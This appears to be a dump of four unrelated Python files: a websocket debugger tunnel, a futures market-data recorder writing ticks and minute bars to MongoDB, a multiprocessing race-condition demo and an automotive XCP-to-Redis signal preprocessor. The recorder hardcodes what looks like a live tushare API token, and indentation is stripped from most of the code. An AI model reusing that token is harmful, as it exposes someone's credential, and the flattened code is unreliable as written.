debugger_thread = Thread(target=self._listen_to_client, args=(self.client, self.ws, index))
web_socket_thread = Thread(target=self._listen_to_web_socket, args=(self.client, self.ws, index))
debugger_thread.start()
web_socket_thread.start()
logger.info('Both debugger and websocket threads started...')
logger.info('Successfully connected to local server..')
debugger_thread.join()
web_socket_thread.join()
logger.info('Both debugger and websocket threads stopped...')
logger.info('Stopped local server..')
def _listen_to_web_socket(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for websocket data, connection status: %s, index: %s', ws_socket.connected, index)
data = ws_socket.recv()
logger.info('Received websocket data: %s, index: %s', data, index)
if data:
                    # Set the response to echo back the received data
response = data
logger.info('Sending to debugger, response: %s, index: %s', response, index)
client.sendall(response)
logger.info('Done sending to debugger, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
logger.info('Client disconnected!, index: %s', index)
client.close()
ws_socket.close()
def _listen_to_client(self, client, ws_socket, index):
try:
while True:
logger.info('Waiting for debugger data, index: %s', index)
buf = bytearray(4096)
nbytes = client.recv_into(buf, 4096)
logger.info('Received debugger data, nbytes: %s, index: %s', nbytes, index)
if nbytes > 0:
responseData = buf[0:nbytes]
logger.info('Sending to websocket, response data: %s, index: %s', responseData, index)
ws_socket.send_binary(responseData)
logger.info('Done sending to websocket, index: %s', index)
else:
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
logger.warning("Connection Timed Out")
finally:
logger.info('Client disconnected %s', index)
client.close()
ws_socket.close()
def start_server(self):
self._listen()
def get_port(self):
return self.local_port
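# Illustrative usage sketch (added commentary, not part of the original module).
# The host name and credentials below are placeholders; real values come from the
# web app's publishing profile. start_server() blocks, so it is run on a thread.
if __name__ == '__main__':
    example_tunnel = TunnelServer(local_addr='127.0.0.1',
                                  local_port=0,  # 0 lets the OS pick a free port
                                  remote_addr='https://<yoursite>.scm.azurewebsites.net',
                                  remote_user_name='<deployment-user>',
                                  remote_password='<deployment-password>')
    if example_tunnel.is_webapp_up():
        Thread(target=example_tunnel.start_server).start()
        logger.warning('Tunnel listening on 127.0.0.1:%s', example_tunnel.get_port())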
|
drEngine.py
|
# encoding: UTF-8
'''
This module implements the market data recording engine: it aggregates tick data,
builds minute bars (K-lines) from it, and inserts both into the database.
DR_setting.json configures which contracts to record and the dominant contract codes.
'''
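# Expected shape of DR_setting.json, inferred from loadSetting() below (contract
# codes here are only examples; each tick/bar entry is [symbol, gateway] plus
# optional exchange, currency and product class for the LTS/IB gateways):
# {
#     "working": true,
#     "tick": [["IF1604", "CTP"], ["EUR.USD", "IB", "IDEALPRO", "USD", "CASH"]],
#     "bar": [["IF1604", "CTP"]],
#     "active": {"IF0000": "IF1604"}
# }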
import json
import os
import copy
from collections import OrderedDict
from datetime import datetime, timedelta
from Queue import Queue, Empty
from threading import Thread
from eventEngine import *
from vtGateway import VtSubscribeReq, VtLogData
from drBase import *
from vtFunction import todayDate
import tushare as ts
ts.set_token('ced15aa738976abf2136cc9e197fbcd34776e0f8183c7660b7fdcd626a715b3b') # paolo
import time
########################################################################
class DrEngine(object):
"""数据记录引擎"""
settingFileName = 'DR_setting.json'
settingFileName = os.getcwd() + '/dataRecorderAlone/' + settingFileName
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
        # Whether we are logged in to CTP
        self.ctpConnected = False
        # Database client
        self.dbClient = None
        # Dominant-contract check result
        self.contractsOK = False
        # Futures account ID
        self.userID = ''
        # Current date
        self.today = todayDate()
        # Dominant-contract mapping: key is the specific contract code (e.g. IF1604), value is the dominant contract code (e.g. IF0000)
        self.activeSymbolDict = {}
        # Tick object dictionary
        self.tickDict = {}
        # Bar (K-line) object dictionary
        self.barDict = {}
        # State for the dedicated thread that performs database inserts
        self.active = False                         # working flag
        self.queue = Queue()                        # task queue
        self.thread = Thread(target=self.run)       # worker thread
        # # Load settings and subscribe to market data
        # self.loadSetting()
#----------------------------------------------------------------------
def loadSetting(self):
"""载入设置"""
with open(self.settingFileName) as f:
drSetting = json.load(f)
        # If 'working' is set to False, do not start market data recording
working = drSetting['working']
if not working:
return
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = setting[0]
                # For the LTS and IB gateways, the exchange code is required to subscribe
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
                # For the IB gateway, the currency and product class are also required
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
                drTick = DrTickData()   # this tick instance can be used to cache partial data (currently unused)
self.tickDict[vtSymbol] = drTick
if 'bar' in drSetting:
l = drSetting['bar']
for setting in l:
symbol = setting[0]
vtSymbol = symbol
req = VtSubscribeReq()
req.symbol = symbol
if len(setting)>=3:
req.exchange = setting[2]
vtSymbol = '.'.join([symbol, req.exchange])
if len(setting)>=5:
req.currency = setting[3]
req.productClass = setting[4]
self.mainEngine.subscribe(req, setting[1])
bar = DrBarData()
self.barDict[vtSymbol] = bar
if 'active' in drSetting:
d = drSetting['active']
            # Note: for the IB and LTS gateways, vtSymbol should carry the '.<exchange>' suffix
for activeSymbol, vtSymbol in d.items():
self.activeSymbolDict[vtSymbol] = activeSymbol
        # Changed: the insert thread is now created by the button in the widget
        # # Start the database insert thread
        # self.start()
        # Register event listeners
self.registerEvent()
#----------------------------------------------------------------------
def procecssTickEvent(self, event):
"""处理行情推送"""
tick = event.dict_['data']
vtSymbol = tick.vtSymbol
        # Filter ticks outside trading hours (coarse filter; it does not distinguish the sessions of individual contracts)
        # http://99qh.fx168.com/cj/industry/1604/1861578.shtml
if ('15:00:00' < tick.time < '21:00:00') or ('02:30:00' < tick.time < '09:00:00') or ('11:30:00' < tick.time < '13:00:00'):
return
        # Also filter by local time, in case the engine was started outside trading hours
localtime = time.strftime('%H:%M:%S',time.localtime())
if ('15:05:00' < localtime < '20:55:00') or ('02:35:00' < localtime < '08:55:00') or ('11:35:00' < localtime < '12:55:00'):
return
        # Convert the tick format
drTick = DrTickData()
d = drTick.__dict__
for key in d.keys():
if key in ['lastPrice', 'upperLimit', 'lowerLimit', 'openPrice',
'lowPrice', 'highPrice', 'preClosePrice', 'bidPrice1', 'askPrice1']:
d[key] = round(tick.__getattribute__(key), 4)
elif key == 'datetime':
drTick.datetime = datetime.strptime(' '.join([tick.date, tick.time]), '%Y%m%d %H:%M:%S.%f')
else:
d[key] = tick.__getattribute__(key)
        # Update tick data
if vtSymbol in self.tickDict:
self.insertData(TICK_DB_NAME, vtSymbol, drTick)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(TICK_DB_NAME, activeSymbol, drTick)
        # Emit a log entry
        self.writeDrLog(u'Recorded tick data %s, time: %s, last: %s, bid: %s, ask: %s'
                        % (drTick.vtSymbol, drTick.time, drTick.lastPrice, drTick.bidPrice1, drTick.askPrice1))
        # Update minute bar data
if vtSymbol in self.barDict:
bar = self.barDict[vtSymbol]
            # First tick for this symbol, or a new minute has started
if not bar.datetime or bar.datetime.minute != drTick.datetime.minute:
if bar.vtSymbol:
newBar = copy.copy(bar)
self.insertData(MINUTE_DB_NAME, vtSymbol, newBar)
if vtSymbol in self.activeSymbolDict:
activeSymbol = self.activeSymbolDict[vtSymbol]
self.insertData(MINUTE_DB_NAME, activeSymbol, newBar)
                    self.writeDrLog(u'Recorded minute bar %s, time: %s, O: %s, H: %s, L: %s, C: %s'
                                    % (bar.vtSymbol, bar.time, bar.open, bar.high,
                                       bar.low, bar.close))
bar.vtSymbol = drTick.vtSymbol
bar.symbol = drTick.symbol
bar.exchange = drTick.exchange
bar.open = drTick.lastPrice
bar.high = drTick.lastPrice
bar.low = drTick.lastPrice
bar.close = drTick.lastPrice
bar.date = drTick.date
bar.time = drTick.time
bar.datetime = drTick.datetime
bar.volume = drTick.volume
bar.openInterest = drTick.openInterest
                bar.openPrice = drTick.openPrice        # today's open price
                bar.highPrice = drTick.highPrice        # today's high price
                bar.lowPrice = drTick.lowPrice          # today's low price
bar.preClosePrice = drTick.preClosePrice
            # Otherwise keep accumulating the current bar
else:
bar.high = max(bar.high, drTick.lastPrice)
bar.low = min(bar.low, drTick.lastPrice)
bar.close = drTick.lastPrice
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TICK, self.procecssTickEvent)
#----------------------------------------------------------------------
def insertData(self, dbName, collectionName, data):
"""插入数据到数据库(这里的data可以是CtaTickData或者CtaBarData)"""
self.queue.put((dbName, collectionName, data.__dict__))
#----------------------------------------------------------------------
def run(self):
"""运行插入线程"""
while self.active:
try:
dbName, collectionName, d = self.queue.get(block=True, timeout=1)
self.mainEngine.dbInsert(dbName, collectionName, d)
except Empty:
pass
#----------------------------------------------------------------------
def start(self):
"""启动"""
self.active = True
self.thread.start()
self.writeDrLog(u'启动数据引擎成功')
#----------------------------------------------------------------------
def stop(self):
"""退出"""
if self.active:
self.active = False
self.thread.join()
#----------------------------------------------------------------------
def writeDrLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
event = Event(type_=EVENT_DATARECORDER_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
#----------------------------------------------------------------------
def ctpConnect(self):
        # Log in to CTP
        self.mainEngine.connect('CTP')
        # Wait one second; otherwise the check below would run before the login has completed
        time.sleep(1)
        self.userID = self.mainEngine.gatewayDict['CTP'].mdApi.userID
        if self.mainEngine.gatewayDict['CTP'].tdConnected:
            self.ctpConnected = True
            self.writeDrLog(u'CTP login succeeded. Account: "%s"' % self.userID)
        else:
            self.writeDrLog(u'CTP login failed. Account: "%s"' % self.userID)
#----------------------------------------------------------------------
def startAll(self):
        if not self.ctpConnected:
            self.writeDrLog(u'Not logged in to CTP; futures tick subscription failed')
            return
        if self.dbClient is None:
            self.writeDrLog(u'Database not connected; futures tick subscription failed')
            return
        if not self.active:
            self.writeDrLog(u'Data engine not started; futures tick subscription failed')
            return
        # Subscribe to contracts
        self.loadSetting()
        self.writeDrLog(u'Futures tick subscription succeeded')
#----------------------------------------------------------------------
def stopAll(self):
        # Unsubscribe from tick events
        self.eventEngine.unregister(EVENT_TICK, self.procecssTickEvent)
        # Stop recording futures ticks
        self.writeDrLog(u'Futures tick subscription cancelled')
#----------------------------------------------------------------------
def dbConnect(self):
        # Connect to the database
        self.mainEngine.dbConnect()
        self.dbClient = self.mainEngine.dbClient
        if self.dbClient:
            self.writeDrLog(u'MongoDB connection succeeded')
        else:
            self.writeDrLog(u'MongoDB connection failed')
#----------------------------------------------------------------------
def contractsInit(self):
"""判断期货主力合约"""
# 获取上个交易日lastDate
todayDate = time.strftime('%Y-%m-%d',time.localtime())
mt = ts.Master()
Cal = mt.TradeCal(exchangeCD='XSGE',beginDate=''.join(todayDate.split('-')),endDate=''.join(todayDate.split('-')),field='')
lastDate = Cal.at[0, 'prevTradeDate']
lastDate = ''.join(lastDate.split('-'))
        # Get the dominant contracts
st = ts.Market()
with open(self.settingFileName) as f:
drSetting = json.load(f)
self.contractsOK = True
if 'tick' in drSetting:
l = drSetting['tick']
for setting in l:
if setting[1] != 'CTP':
continue
contract = filter(str.isalpha, str(setting[0]))
data = st.MktMFutd(tradeDate=lastDate,contractObject=contract,field='ticker,mainCon,turnoverVol')
                # Dominant contract by open interest (Datayes)
                ticker1 = data[data['mainCon'] == 1].iloc[0]['ticker']
                # Dominant contract by yesterday's trading volume
                ticker2 = data.at[data['turnoverVol'].argmax(), 'ticker']
                # print ticker1, ticker2
                # continue
                # When the volume-based and open-interest-based dominant contracts disagree, report it
                if setting[0] != ticker1 or setting[0] != ticker2:
                    self.contractsOK = False
                    self.writeDrLog(u'Futures %s: please confirm the dominant contract (volume is used by default):\n %s - currently selected\n %s - Datayes open-interest dominant\n %s - yesterday volume dominant' % (contract, setting[0], ticker1, ticker2))
                    print (u'Futures %s: please confirm the dominant contract (volume is used by default):\n %s - currently selected\n %s - Datayes open-interest dominant\n %s - yesterday volume dominant' % (contract, setting[0], ticker1, ticker2))
print data
        if not self.contractsOK:
            self.writeDrLog(u'Please check whether the dominant contracts are correct! (not mandatory)')
        else:
            self.writeDrLog(u'Contract initialization succeeded!')
|
ex2_nolock.py
|
import multiprocessing
# python -m timeit -s "import ex2_nolock" "ex2_nolock.run_workers()"
# 12ms
def work(value, max_count):
for n in range(max_count):
value.value += 1
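# Added commentary: value.value += 1 is a read-modify-write, so concurrent processes
# can interleave and lose increments; the printed total is therefore usually well
# below total_expected_count. A locked variant (not used above) could look like this,
# using the lock that multiprocessing.Value carries via get_lock():
def work_with_lock(value, max_count):
    for n in range(max_count):
        with value.get_lock():
            value.value += 1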
def run_workers():
NBR_PROCESSES = 4
MAX_COUNT_PER_PROCESS = 1000
total_expected_count = NBR_PROCESSES * MAX_COUNT_PER_PROCESS
processes = []
value = multiprocessing.Value('i', 0)
for process_nbr in range(NBR_PROCESSES):
p = multiprocessing.Process(
target=work, args=(value, MAX_COUNT_PER_PROCESS))
p.start()
processes.append(p)
# wait for the processes to finish
for p in processes:
p.join()
# print the final value
print "Expecting to see a count of {}".format(total_expected_count)
print "We have counted to {}".format(value.value)
if __name__ == "__main__":
run_workers()
|
PreHandler.py
|
import json
import time
import threading
import os
# from Ipc import Ipc
from lib import Ipc
class PreHandler:
def __init__(self):
self.end_thread = False
self.redis = Ipc(name='XCP')
self.redis_publisher = None
self.redis_dict_raw = dict()
self.redis_dict = dict()
self.bin_path = 'XCP_command.bin'
self.command_list = list()
self.daq_pack_len_list = list()
self.daq_pack_len = list()
self.init_redis_dict()
def init_redis(self):
self.redis_publisher = threading.Thread(target=self.start_publish)
self.redis_publisher.start()
def start_publish(self):
while not self.end_thread:
self.redis.publish('xcp/obj_lane', json.dumps(self.redis_dict))
time.sleep(0.05)
def init_redis_dict(self):
"""
Initialize structure of redis dictionary for raw data and data to redis.
Returns:
"""
self.redis_dict_raw.update({'objects': list(), 'cr_objects': list(), 'lanes': {'a0': list(), 'type': list()},
'vehInfo': dict(), 'traj': dict(), 'other': dict()})
self.redis_dict.update({'objects': list(), 'lanes': list(), 'vehInfo': dict(), 'traj': dict(), 'debug': dict()})
for i in range(19): # Initialize structure of front objects in raw data list
self.redis_dict_raw['objects'].append({'dx': dict(),
'dy': dict(),
'ax': dict(),
'vx': dict(),
'yaw_angle': dict(),
'collision_prob': dict(),
'class': dict(),
'index': dict(),
'state': dict()})
for i in range(12): # Initialize structure of rear corner radar objects in raw data list
self.redis_dict_raw['cr_objects'].append({'dx': dict(),
'dy': dict(),
'vx': dict(),
'index': dict(),
'state': dict(),
'collision_prob': {'value': 0}})
        for i in range(4):  # Initialize structure of the 4 lane-line a0 coefficients in the raw data list
self.redis_dict_raw['lanes']['a0'].append(dict())
        for i in range(4):  # Initialize structure of the 4 lane-line types in the raw data list
self.redis_dict_raw['lanes']['type'].append(dict())
self.redis_dict_raw['lanes'].update({'a1': dict(), 'a2': dict(), 'a3': dict(), 'a4': dict(), 'a5': dict(),
'start': dict(), 'end': dict()})
self.redis_dict_raw['vehInfo'].update({'VehSpd': dict(), 'axv': dict(), 'ayv': dict(), 'ACC': dict(),
'TJA': dict(), 'ALC': dict(), 'HF': dict(), 'LOC_L': dict(),
'LOC_R': dict(), 'LDW': dict(), 'Gear': dict(), 'TargetSpd': dict(),
'TurnLight_L': dict(), 'TurnLight_R': dict(), 'AD': dict(),
'LC_fail_reason': dict(), 'LC_progress': dict(), 'LC_reason': dict(),
'Hands_on_warning_level': dict(), 'AD_inactive_reason': dict(),
'HF_tor_reason': dict(), 'HF_exit_forecast': dict(), 'Auto_LC': dict(),
'AD_enter_ramp': dict(), 'Eyes_on_warning_level': dict(),
'HF_available': dict(), 'HF_quit': dict(), 'AD_quit': dict(),
'is_AD_active_reminder': dict(), 'LC_confirmation': dict(),
'AD_available': dict(), 'AD_Switch': dict(),
'AD_on_remind': dict()})
self.redis_dict_raw['traj'].update({'a5': dict(), 'a4': dict(), 'a3': dict(), 'a2': dict(), 'a1': dict(),
'a0': dict(), 'dx_end': dict(), 'ss_status': dict(),
'ss_left_start': dict(), 'ss_left_end': dict(),
'ss_right_start': dict(), 'ss_right_end': dict()})
self.redis_dict_raw['other'].update({'acc': dict(), 'dodge': dict(), 'coll_rl': dict(), 'coll_rr': dict()})
for i in range(31): # Initialize structure of objects in data to redis
self.redis_dict['objects'].append({'class': 1, # car as default
'state': 0,
'ax': 0,
'vx': 0,
'yaw_angle': 0,
'collision_prob': 0,
'acc': 0,
'dodge': 0,
'index': 0,
'dx': 0,
'dy': 0})
for i in range(4): # Initialize structure of lines in data to redis
self.redis_dict['lanes'].append({'a5': 0,
'a4': 0,
'a3': 0,
'a2': 0,
'a1': 0,
'a0': 0,
'type': 0,
'end': 0,
'start': 0})
self.redis_dict['vehInfo'].update({'VehSpd': 0, 'axv': 0, 'ayv': 0, 'ACC': 0, 'TJA': 0,
'ALC': 0, 'HF': 0, 'LOC_L': 0, 'LOC_R': 0, 'LDW': 0,
'Gear': 0, 'TargetSpd': 0, 'TurnLight_L': 0, 'TurnLight_R': 0, 'AD': 0,
'LC_fail_reason': 0, 'LC_progress': 0, 'LC_reason': 0,
'Hands_on_warning_level': 0, 'AD_inactive_reason': 0,
'HF_tor_reason': 0, 'HF_exit_forecast': 0, 'AD_available': 0,
'AD_enter_ramp': 0, 'Eyes_on_warning_level': 0, 'AD_Switch': 0,
'HF_available': 0, 'HF_quit': 0, 'is_AD_active_reminder': 0,
'AD_quit': 0, 'LC_confirmation': 0, 'Auto_LC': 0, 'AD_on_remind': 0})
self.redis_dict['traj'].update({'a5': 0, 'a4': 0, 'a3': 0, 'a2': 0, 'a1': 0, 'a0': 0, 'dx_end': 0,
'ss_status': 0, 'ss_left_start': 0, 'ss_left_end': 0,
'ss_right_start': 0, 'ss_right_end': 0})
self.redis_dict['debug'].update({'accTar': 0, 'dodgeTar': 0, 'coll_rl': 0, 'coll_rr': 0})
def get_commands(self):
result = True
if os.path.isfile(self.bin_path):
try:
with open(self.bin_path, 'rb') as fn:
data = fn.read()
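                # The loop below treats the file as length-prefixed records: each
                # record starts with a length byte N and occupies N + 4 bytes in
                # total (inferred from the arithmetic, not from an XCP spec).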
init_value = data[0]
next_command = init_value + 4
self.command_list.append(list())
self.command_list[0].append(init_value)
for i in range(1, len(data)):
if i < next_command:
self.command_list[-1].append(data[i])
else:
self.command_list.append(list())
self.command_list[-1].append(data[i])
next_command += data[i] + 4
print(len(self.command_list))
except IOError as err:
print(str(err))
result = False
else:
print('bin file does not exist!')
result = False
return result
def read_json(self):
"""
Read XCP_config.json to allocate variables to dictionary we need to send to redis
Returns:
"""
result = True
sig_dict_tmp = None
try:
with open(os.path.join(os.path.dirname(self.bin_path), 'XCP_config.json')) as fn:
sig_dict_tmp = json.loads(fn.read())
except IOError:
print('Error occurred while reading XCP_config.json')
result = False
if result:
daq_tmp = dict()
for each_sig in sig_dict_tmp:
if isinstance(sig_dict_tmp[each_sig], dict):
if sig_dict_tmp[each_sig]['daq'] not in daq_tmp.keys():
daq_tmp[sig_dict_tmp[each_sig]['daq']] = dict()
if sig_dict_tmp[each_sig]['odt'] not in daq_tmp[sig_dict_tmp[each_sig]['daq']].keys():
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] = list()
if not daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']]\
.append([sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
elif sig_dict_tmp[each_sig]['address'] > \
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']][-1][0]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] \
.append([sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
else:
for i in range(len(daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']])):
if sig_dict_tmp[each_sig]['address'] < \
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']][i][0]:
daq_tmp[sig_dict_tmp[each_sig]['daq']][sig_dict_tmp[each_sig]['odt']] \
.insert(i, [sig_dict_tmp[each_sig]['address'],
each_sig,
sig_dict_tmp[each_sig]['raw_len']])
break
byte_ptr = 0
for i in range(len(daq_tmp.keys())):
for j in range(len(daq_tmp[i].keys())):
for each_item in daq_tmp[i][j]:
name_tmp = each_item[1]
if '_m_IDdxForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDdyForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDIndexList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDTypeForAdList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['class']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDaxList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['ax']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDvxList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDyawAngleList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['yaw_angle']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_IDCollisionProbList' in name_tmp:
self.redis_dict_raw['objects'][int(name_tmp.split('.')[-1].replace('_', ''))]['collision_prob']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneAnnotatedRLObjects' in name_tmp:
if name_tmp.endswith('_m_dx'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_dy'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_id'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vxvRef'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isValid'):
self.redis_dict_raw['cr_objects'][int(name_tmp.split('.')[-2].replace('_', ''))]['state']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneAnnotatedRRObjects' in name_tmp:
if name_tmp.endswith('_m_dx'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['dx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_dy'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['dy']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_id'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['index']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_vxvRef'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['vx']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_isValid'):
self.redis_dict_raw['cr_objects'][6 + int(name_tmp.split('.')[-2].replace('_', ''))]['state']\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_feasibility_corner_arb_Rrl'):
self.redis_dict_raw['other']['coll_rl'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_feasibility_corner_arb_Rrr'):
self.redis_dict_raw['other']['coll_rr'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_accTargetPosition'):
self.redis_dict_raw['other']['acc'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_intelDodgeTargetPosition'):
self.redis_dict_raw['other']['dodge'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_hmiLineC0._m_value.' in name_tmp:
self.redis_dict_raw['lanes']['a0'][int(name_tmp.split('.')[-1].replace('_', ''))]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC1'):
self.redis_dict_raw['lanes']['a1'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC2'):
self.redis_dict_raw['lanes']['a2'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC3'):
self.redis_dict_raw['lanes']['a3'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC4'):
self.redis_dict_raw['lanes']['a4'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineC5'):
self.redis_dict_raw['lanes']['a5'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineDxStart'):
self.redis_dict_raw['lanes']['start'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif name_tmp.endswith('_m_hmiLineDxEnd'):
self.redis_dict_raw['lanes']['end'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_hmiLineType._m_value.' in name_tmp:
self.redis_dict_raw['lanes']['type'][int(name_tmp.split('.')[-1].replace('_', ''))]\
.update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_isADAvailableInfo' in name_tmp:
self.redis_dict_raw['vehInfo']['AD_available'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeFailReason' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_fail_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeProgress' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_progress'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '_m_laneChangeReason' in name_tmp:
self.redis_dict_raw['vehInfo']['LC_reason'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._handsOnWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['Hands_on_warning_level'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._HFeyesOnWarningLevel' in name_tmp:
self.redis_dict_raw['vehInfo']['Eyes_on_warning_level'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
elif '._isHFAvailable' in name_tmp:
self.redis_dict_raw['vehInfo']['HF_available'].update({'raw_len': each_item[2],
'start': byte_ptr,
'end': byte_ptr + abs(each_item[2]) % 32,
'value': 0})
